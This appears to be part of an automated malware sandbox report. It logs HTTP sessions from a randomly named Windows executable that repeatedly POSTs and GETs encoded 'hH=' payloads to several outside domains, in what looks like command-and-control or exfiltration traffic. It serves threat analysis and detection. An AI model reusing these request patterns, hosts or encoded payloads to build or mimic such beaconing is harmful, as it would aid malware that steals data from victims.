                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 51 6f 45 4d 4e 30 79 42 6b 33 54 32 74 52 6e 6e 68 6a 56 45 72 49 5a 41 4c 6e 65 45 41 77 46 71 79 68 58 41 68 63 77 49 30 52 4e 30 61 6c 53 35 66 4a 4c 4a 5a 2f 4a 7a 39 2b 52 49 48 69 2b 6a 72 57 45 77 4d 4f 46 72 34 42 31 6b 73 74 37 52 76 71 74 69 7a 2b 6d 6b 62 74 32 6f 75 4a 58 51 73 65 43 4a 67 51 4d 53 30 52 43 4d 75 72 4f 70 55 4e 46 32 34 6b 37 6f 72 45 75 4a 6d 63 7a 61 58 62 6a 52 49 52 6c 7a 53 73 48 35 79 45 62 66 6e 74 61 70 79 69 58 45 42 48 48 32 52 4f 6e 74 5a 75 71 5a 79 2f 32 61 79 67 54 2b 56 59 75 55 57 55 35 78 33 4a 53 6c 63 47 74 46 70 6c 41 66 35 38 4c 52 71 77 3d 3d
                Data Ascii: hH=ChGtZ61rPNgdQoEMN0yBk3T2tRnnhjVErIZALneEAwFqyhXAhcwI0RN0alS5fJLJZ/Jz9+RIHi+jrWEwMOFr4B1kst7Rvqtiz+mkbt2ouJXQseCJgQMS0RCMurOpUNF24k7orEuJmczaXbjRIRlzSsH5yEbfntapyiXEBHH2ROntZuqZy/2aygT+VYuUWU5x3JSlcGtFplAf58LRqw==
                Jul 3, 2024 08:53:43.992197990 CEST | 289 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:43 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.9 | 49717 | 103.197.25.241 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:45.668262959 CEST | 1759 | OUT | POST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:53:46.523559093 CEST | 289 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:46 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.9 | 49718 | 103.197.25.241 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:48.213387966 CEST | 468 | OUT | GET /vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:53:49.313640118 CEST | 289 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:48 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.9 | 49719 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:54.381542921 CEST | 758 | OUT | POST /gvk0/ HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dennisrosenberg.studio
                Referer: http://www.dennisrosenberg.studio/gvk0/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=CDMfnI8CalzoxjHyjRdstDzKuGOu7THx0zp3XhhDYMCsJ3vIspPtl4iVm17qq9NykJQs4tm25MHDb6gMpqiMVBjyptvgwGnnFeLqY6OlEOxByz3GlWJitovbSQHa/+Kt7hkzcEsJ8XvmuBSVKThisIsYob7ygfELDXrqx+qlIBTSXoy4CKXgzZcRNqby
                Jul 3, 2024 08:53:55.015577078 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:53:54 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.9 | 49720 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:56.921708107 CEST | 782 | OUT | POST /gvk0/ HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dennisrosenberg.studio
                Referer: http://www.dennisrosenberg.studio/gvk0/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=CDMfnI8Calzo+j3yhyls8zzJhmOuijH10z13XlZTYZqsJTjI+8zt1oiVuV7vu9M+kJMO4s225MDDb4oMp5KNURjwwdv+0GnnFeLqY7rIEOpByiHG3y9luovcbwHauuKx7hlkcFAz8VXmuDKVJCht5Yse2b6zmOt4awm02PnHRTXpUJSmT4e7mOc2KNSaBOg4AgZFexMMPWTnACD1qQ==
                Jul 3, 2024 08:53:57.567919970 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:53:57 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.9 | 49721 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:59.471044064 CEST | 1795 | OUT | POST /gvk0/ HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dennisrosenberg.studio
                Referer: http://www.dennisrosenberg.studio/gvk0/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:00.123451948 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:00 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.9 | 49722 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:02.020833969 CEST | 480 | OUT | GET /gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g== HTTP/1.1
                Host: www.dennisrosenberg.studio
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:02.654025078 CEST | 113 | IN | HTTP/1.1 439
                date: Wed, 03 Jul 2024 06:54:02 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.9 | 49723 | 212.227.172.254 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:15.772854090 CEST | 758 | OUT | POST /4ksh/ HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.ennerdaledevcons.co.uk
                Referer: http://www.ennerdaledevcons.co.uk/4ksh/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=ZTOIBOvNXaSzn1l13oT6DPybHqTHX43CDQ4UQ9xwEHfeD2/BKfq6/fYmE9XocGpl6VqoOntP7OZbNoJ5Fn8hV2f1JHqN1ocKNftFUu3tN4VjMMsHlKP5yey6uD7OBz6i/Lf9I067SSwubCfU3pfDxQOeu0BLkow8dCsmriBg7UNYa3HpJ5Q2CenRU6Po
                Jul 3, 2024 08:54:16.396599054 CEST | 434 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:16 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/
                Expires: Wed, 03 Jul 2024 07:14:16 GMT
                Cache-Control: max-age=1200
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.9 | 49724 | 212.227.172.254 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:18.312500954 CEST | 782 | OUT | POST /4ksh/ HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.ennerdaledevcons.co.uk
                Referer: http://www.ennerdaledevcons.co.uk/4ksh/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=ZTOIBOvNXaSzo1517q76Fvycb6THZY2JDXwUQ801HxPeGnjBLeq6y/YmPdXpSmon6VmOOlJP7K5bNp55GQA+Umf3d3qD6IcKNftFUqaCN4NjM88HkrP6/+y5pD7OFz6u/LfPI1mFSU0ubA3U39zA/QOYzEAZqYxFSh0ktFlfuXxfU2n3YLZtXJn2TdGAt0CiSQqiroD/8wR8OIwuRg==
                Jul 3, 2024 08:54:18.945698977 CEST | 434 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:18 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/
                Expires: Wed, 03 Jul 2024 07:14:18 GMT
                Cache-Control: max-age=1200
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.9 | 49725 | 212.227.172.254 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:20.854440928 CEST | 1795 | OUT | POST /4ksh/ HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.ennerdaledevcons.co.uk
                Referer: http://www.ennerdaledevcons.co.uk/4ksh/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:21.480178118 CEST | 434 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:21 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/
                Expires: Wed, 03 Jul 2024 07:14:21 GMT
                Cache-Control: max-age=1200
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                12 | 192.168.2.9 | 49726 | 212.227.172.254 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:23.384319067 CEST | 480 | OUT | GET /4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:24.028270960 CEST | 573 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:23 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4
                Expires: Wed, 03 Jul 2024 07:14:23 GMT
                Cache-Control: max-age=1200
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                13 | 192.168.2.9 | 49727 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:37.153150082 CEST | 755 | OUT | POST /9285/ HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.artemhypnotherapy.com
                Referer: http://www.artemhypnotherapy.com/9285/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=+6kxNYcNLa9o2fDPTkJpKyaS+KTeFU62gfe8H1RX2JNTMMlu72aq/VS/bwahPnETsOuihYXndQItpeGhkB7bTJhyHWpwga7gy14acOhVMwjjJjBzHzSFJsPRMvigay6SiGVn1LG9Kl+3QMqaSO856+v4QDUz678Rh0hMTJxWGStf/I97BbnS3n0ZhA5x
                Jul 3, 2024 08:54:37.805694103 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:37 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                14 | 192.168.2.9 | 49728 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:39.703690052 CEST | 779 | OUT | POST /9285/ HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.artemhypnotherapy.com
                Referer: http://www.artemhypnotherapy.com/9285/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=+6kxNYcNLa9o37HPQFJpNSaR7KTeP066gfC8Hxgc2clTMopu6yGq+VS/UQaoMXEisOiqhcTndRstpaChl2XcSZhwL2py+q7gy14acOF/MxHjJQpzGWmGPcPSbfigey6WiGVR1OmXKj63QNaaSf82vuuzdjVU8rhltGhZZJpPXhZP4pdlQpuJiw0+mnwZonsWfEC0UXlKfylJJwN9ig==
                Jul 3, 2024 08:54:40.340322018 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:40 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                15 | 192.168.2.9 | 49729 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:42.247801065 CEST | 1792 | OUT | POST /9285/ HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.artemhypnotherapy.com
                Referer: http://www.artemhypnotherapy.com/9285/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 33 37 48 50 51 46 4a 70 4e 53 61 52 37 4b 54 65 50 30 36 36 67 66 43 38 48 78 67 63 32 61 39 54 50 62 68 75 37 54 47 71 39 56 53 2f 64 77 61 6c 4d 58 45 46 73 4e 53 51 68 63 66 64 64 53 45 74 70 2f 57 68 69 44 6a 63 62 5a 68 77 44 57 70 7a 67 61 36 6b 79 31 6f 65 63 4f 56 2f 4d 78 48 6a 4a 57 56 7a 57 7a 53 47 4e 63 50 52 4d 76 69 73 61 79 36 36 69 46 6c 76 31 4f 71 74 4b 54 61 33 51 74 4b 61 65 4e 55 32 79 65 75 78 52 44 56 4d 38 72 74 36 74 47 39 76 5a 4a 64 31 58 68 68 50 37 4d 52 6d 48 4a 53 51 33 44 45 30 67 47 77 65 6e 47 49 66 61 56 76 56 4b 31 39 79 45 42 41 47 4b 6b 49 4b 39 74 50 6a 73 42 6b 41 2f 32 5a 6b 65 74 72 4f 49 45 47 79 2f 6f 2b 5a 79 36 2b 74 70 4c 45 4e 72 4f 4c 79 71 38 66 61 4d 77 31 33 32 69 79 77 6f 34 65 49 47 6e 65 68 38 69 77 51 74 54 76 36 50 38 35 2f 79 79 43 6d 6d 76 79 45 46 4f 41 61 75 74 74 77 76 38 78 30 35 31 48 65 72 4d 51 43 36 65 50 68 78 32 35 54 77 67 39 43 4f 79 75 51 66 7a 4b 38 6c 33 71 7a 4b 71 71 42 69 59 69 [TRUNCATED]
                Jul 3, 2024 08:54:42.886197090 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:42 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                16 | 192.168.2.9 | 49730 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:44.777107000 CEST | 479 | OUT | GET /9285/?hH=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuUoJvGkxfj7PnqEMVCvhqUXK8NAJvVg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:45.411957979 CEST | 113 | IN | HTTP/1.1 439
                date: Wed, 03 Jul 2024 06:54:45 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                17 | 192.168.2.9 | 49731 | 109.95.158.122 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:54:58.567219973 CEST | 719 | OUT | POST /prg5/ HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.mocar.pro
                Referer: http://www.mocar.pro/prg5/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 55 54 44 64 38 75 65 6f 4c 64 4c 44 45 6d 38 50 39 6f 36 4e 78 42 49 44 5a 6f 4d 51 6b 43 64 64 4a 47 6d 4f 64 50 4f 49 59 65 65 71 69 6b 37 58 55 58 65 4c 66 46 64 43 4b 4f 31 2f 77 48 66 58 2b 35 6d 2f 71 7a 43 52 44 7a 53 48 32 68 49 41 6f 63 49 38 69 6c 32 45 5a 74 75 71 66 75 48 2f 37 70 45 39 64 43 31 67 55 50 6e 6b 71 61 30 61 4b 70 79 72 71 53 2b 6e 79 52 2b 6a 67 54 7a 45 33 6a 4e 39 30 53 48 58 75 50 69 61 52 7a 49 68 53 41 41 6c 77 6d 35 6c 6b 6a 50 73 41 65 44 63 51 54 42 6d 54 56 72 58 4d 66 78 55 2f 45 42 36
